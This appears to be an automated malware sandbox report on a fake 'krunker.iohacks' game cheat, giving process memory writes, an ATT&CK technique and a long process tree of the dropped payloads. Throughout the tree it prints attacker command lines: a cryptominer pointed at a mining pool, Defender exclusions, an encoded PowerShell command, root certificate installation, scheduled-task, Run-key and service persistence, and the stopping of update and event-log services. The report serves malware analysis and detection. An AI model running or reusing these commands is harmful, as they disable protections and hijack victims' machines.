PID 1704 wrote to memory of 4440	1704	RIP_YOUR_PC_LOL.exe	1.exe
PID 1704 wrote to memory of 4440	1704	RIP_YOUR_PC_LOL.exe	1.exe
PID 1704 wrote to memory of 4440	1704	RIP_YOUR_PC_LOL.exe	1.exe
PID 3448 wrote to memory of 3120	3448	bot.exe	bot.exe
PID 3448 wrote to memory of 3120	3448	bot.exe	bot.exe
PID 3448 wrote to memory of 3120	3448	bot.exe	bot.exe
PID 3400 wrote to memory of 912	3400	[email protected]	cmd.exe
PID 3400 wrote to memory of 912	3400	[email protected]	cmd.exe
PID 3400 wrote to memory of 912	3400	[email protected]	cmd.exe
PID 3400 wrote to memory of 4992	3400	[email protected]	taskse.exe
PID 3400 wrote to memory of 4992	3400	[email protected]	taskse.exe
PID 3400 wrote to memory of 4992	3400	[email protected]	taskse.exe
PID 3444 wrote to memory of 740	3444	ska2pwej.aeh.exe	ska2pwej.aeh.tmp
PID 3444 wrote to memory of 740	3444	ska2pwej.aeh.exe	ska2pwej.aeh.tmp
PID 3444 wrote to memory of 740	3444	ska2pwej.aeh.exe	ska2pwej.aeh.tmp
PID 4440 wrote to memory of 2004	4440	1.exe	Conhost.exe
PID 4440 wrote to memory of 2004	4440	1.exe	Conhost.exe
PID 3752 wrote to memory of 2552	3752	[email protected]	netsh.exe
PID 3752 wrote to memory of 2552	3752	[email protected]	netsh.exe
PID 3752 wrote to memory of 2552	3752	[email protected]	netsh.exe
PID 3400 wrote to memory of 3412	3400	[email protected]	NewB.exe
PID 3400 wrote to memory of 3412	3400	[email protected]	NewB.exe
PID 3400 wrote to memory of 3412	3400	[email protected]	NewB.exe
PID 3400 wrote to memory of 912	3400	[email protected]	cmd.exe
PID 3400 wrote to memory of 912	3400	[email protected]	cmd.exe
PID 3400 wrote to memory of 912	3400	[email protected]	cmd.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

912 attrib.exe
4996 attrib.exe
5620 attrib.exe

pid	process
912	attrib.exe
4996	attrib.exe
5620	attrib.exe

C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3228
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
    "4363463463464363463463463.exe"
    3⤵
    - Executes dropped EXE
    PID:4720
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\288C47~1.EXE"
      4⤵
      PID:5932
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\288C47~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\288C47~1.EXE
        5⤵
        
        PID:5264
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ISetup4.exe"
        6⤵
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\ISetup4.exe
        
        C:\Users\Admin\AppData\Local\Temp\ISetup4.exe
        7⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 612
        8⤵
        Program crash
        
        PID:6544
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
        6⤵
        
        PID:284
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        7⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
        8⤵
        
        PID:1284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:7372
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe"
      4⤵
      PID:5296
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe
        5⤵
        
        PID:5668
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2C75.tmp.bat""
        6⤵
        
        PID:5384
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:3528
        
        C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        7⤵
        
        PID:7712
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        8⤵
        
        PID:7200
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        9⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        10⤵
        Creates scheduled task(s)
        
        PID:6248
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        8⤵
        
        PID:3420
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiiii.exe"
      4⤵
      PID:4332
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiiii.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiiii.exe
        5⤵
        
        PID:5188
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6848
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:608
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6992
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3580
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 884
        6⤵
        Program crash
        
        PID:6676
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe"
      4⤵
      PID:6556
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup2.exe
        5⤵
        
        PID:6888
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U5BC0~1.EXE"
        6⤵
        
        PID:8104
        
        C:\Users\Admin\AppData\Local\Temp\U5BC0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U5BC0~1.EXE
        7⤵
        
        PID:1184
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GCBGCAFIIE.exe"
        8⤵
        
        PID:5916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\GCBGCAFIIE.exe
        9⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\GCBGCAFIIE.exe
        
        C:\Users\Admin\AppData\Local\Temp\GCBGCAFIIE.exe
        10⤵
        
        PID:5584
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GCBGCAFIIE.exe
        11⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GCBGCAFIIE.exe
        12⤵
        
        PID:5396
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        13⤵
        Runs ping.exe
        
        PID:5584
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1184 -s 2616
        8⤵
        Program crash
        
        PID:2140
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U5BC1~1.EXE"
        6⤵
        
        PID:6632
        
        C:\Users\Admin\AppData\Local\Temp\U5BC1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U5BC1~1.EXE
        7⤵
        
        PID:7544
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 1168
        6⤵
        Program crash
        
        PID:8112
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\INSTAL~1.EXE"
      4⤵
      PID:7128
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\INSTAL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\INSTAL~1.EXE
        5⤵
        
        PID:6084
      - C:\Users\Admin\AppData\Local\Temp\is-UB971.tmp\INSTAL~1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UB971.tmp\INSTAL~1.tmp" /SL5="$104DC,3121405,832512,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\INSTAL~1.EXE"
        6⤵
        
        PID:6176
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE" Microsoft.NETCore.App 3.1.22
        7⤵
        
        PID:5496
        
        C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE Microsoft.NETCore.App 3.1.22
        8⤵
        
        PID:6872
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE" Microsoft.NETCore.App 5.0.13
        7⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE Microsoft.NETCore.App 5.0.13
        8⤵
        
        PID:388
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE" Microsoft.NETCore.App 6.0.11
        7⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE Microsoft.NETCore.App 6.0.11
        8⤵
        
        PID:6264
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE" Microsoft.NETCore.App 7.0.0
        7⤵
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\is-PUAP1.tmp\NETCOR~1.EXE Microsoft.NETCore.App 7.0.0
        8⤵
        
        PID:5940
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RTKAUD~1.EXE"
      4⤵
      PID:5360
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RTKAUD~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RTKAUD~1.EXE
        5⤵
        
        PID:6136
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Control.exe
        6⤵
        
        PID:5764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Control.exe
        7⤵
        
        PID:7500
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Anyns.exe
        6⤵
        
        PID:6824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Anyns.exe
        7⤵
        
        PID:7512
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Header.exe
        6⤵
        
        PID:6364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Header.exe
        7⤵
        
        PID:7452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files
        6⤵
        
        PID:7040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files
        7⤵
        
        PID:6428
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\
        6⤵
        
        PID:5444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\
        7⤵
        
        PID:7324
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Taskhost.exe
        6⤵
        
        PID:5636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Taskhost.exe
        7⤵
        
        PID:7336
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Runtime.exe
        6⤵
        
        PID:6008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Runtime.exe
        7⤵
        
        PID:7176
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" powershell -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\Sideload\
        6⤵
        
        PID:5812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\Sideload\
        7⤵
        
        PID:4580
      - C:\Windows\SYSTEM32\certutil.exe
        
        "certutil.exe" -addstore root C:\ProgramData\Microsoft\Diagnosis\Sideload\rtt.cer
        6⤵
        
        PID:64
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\MICROS~1\Diagnosis\MICROS~1.EXE"
        6⤵
        
        PID:3576
        
        C:\PROGRA~3\MICROS~1\Diagnosis\MICROS~1.EXE
        
        C:\PROGRA~3\MICROS~1\Diagnosis\MICROS~1.EXE
        7⤵
        
        PID:1480
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\MICROS~1\Diagnosis\MICROS~2.EXE"
        6⤵
        
        PID:4104
        
        C:\PROGRA~3\MICROS~1\Diagnosis\MICROS~2.EXE
        
        C:\PROGRA~3\MICROS~1\Diagnosis\MICROS~2.EXE
        7⤵
        
        PID:380
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\MICROS~1\Diagnosis\MICROS~3.EXE"
        6⤵
        
        PID:5588
        
        C:\PROGRA~3\MICROS~1\Diagnosis\MICROS~3.EXE
        
        C:\PROGRA~3\MICROS~1\Diagnosis\MICROS~3.EXE
        7⤵
        
        PID:3580
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\MICROS~1\Diagnosis\Sideload\MICROS~1.EXE"
        6⤵
        
        PID:4508
        
        C:\PROGRA~3\MICROS~1\Diagnosis\Sideload\MICROS~1.EXE
        
        C:\PROGRA~3\MICROS~1\Diagnosis\Sideload\MICROS~1.EXE
        7⤵
        
        PID:7436
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asas.exe"
      4⤵
      PID:3960
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asas.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asas.exe
        5⤵
        
        PID:4460
      - C:\Windows\System32\werfault.exe
        
        \??\C:\Windows\System32\werfault.exe
        6⤵
        
        PID:6440
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex12.exe"
      4⤵
      PID:8100
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex12.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex12.exe
        5⤵
        
        PID:8144
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:7736
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\fate.exe"
        7⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\fate.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\fate.exe
        8⤵
        
        PID:3148
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\olehpsp.exe"
        7⤵
        
        PID:380
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\olehpsp.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\olehpsp.exe
        8⤵
        
        PID:220
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GHHJHJ~1.EXE"
      4⤵
      PID:2240
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GHHJHJ~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GHHJHJ~1.EXE
        5⤵
        
        PID:7208
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:5660
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe"
      4⤵
      PID:7776
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe
        5⤵
        
        PID:7844
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        6⤵
        
        PID:7948
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        6⤵
        
        PID:6436
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
        6⤵
        
        PID:2208
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Max.exe"
      4⤵
      PID:1544
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Max.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Max.exe
        5⤵
        
        PID:5852
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\test.exe"
      4⤵
      PID:920
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\test.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\test.exe
        5⤵
        
        PID:6812
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcQBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAZwBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAaABlACMAPgA="
        6⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand PAAjAGwAZQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcQBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAZwBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAaABlACMAPgA=
        7⤵
        
        PID:556
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Miner.exe"
        6⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Roaming\Miner.exe
        
        C:\Users\Admin\AppData\Roaming\Miner.exe
        7⤵
        
        PID:7200
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        8⤵
        
        PID:3768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:8152
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        
        PID:7256
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:8076
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:5088
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:6480
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        8⤵
        Launches sc.exe
        
        PID:2572
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        8⤵
        Launches sc.exe
        
        PID:4984
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        8⤵
        
        PID:7568
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "RYVSUJUA"
        8⤵
        Launches sc.exe
        
        PID:1840
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "RYVSUJUA" binpath= "C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe" start= "auto"
        8⤵
        Launches sc.exe
        
        PID:1628
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        8⤵
        Launches sc.exe
        
        PID:5728
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "RYVSUJUA"
        8⤵
        Launches sc.exe
        
        PID:2900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Miner.exe"
        8⤵
        
        PID:5732
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        9⤵
        
        PID:6288
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\SHORTC~1.EXE"
        6⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Roaming\SHORTC~1.EXE
        
        C:\Users\Admin\AppData\Roaming\SHORTC~1.EXE
        7⤵
        
        PID:6180
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\amert.exe"
      4⤵
      PID:7196
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\amert.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\amert.exe
        5⤵
        
        PID:6616
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NVOKCU~1.EXE"
      4⤵
      PID:2656
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NVOKCU~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NVOKCU~1.EXE
        5⤵
        
        PID:6248
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rty45.exe"
      4⤵
      PID:1232
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rty45.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rty45.exe
        5⤵
        
        PID:1484
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1111.exe"
      4⤵
      PID:5152
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1111.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1111.exe
        5⤵
        
        PID:4496
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 156
        6⤵
        Program crash
        
        PID:5908
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe"
      4⤵
      PID:6468
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe
        5⤵
        
        PID:4492
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ROULLE~1.EXE"
      4⤵
      PID:3420
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ROULLE~1.EXE
        
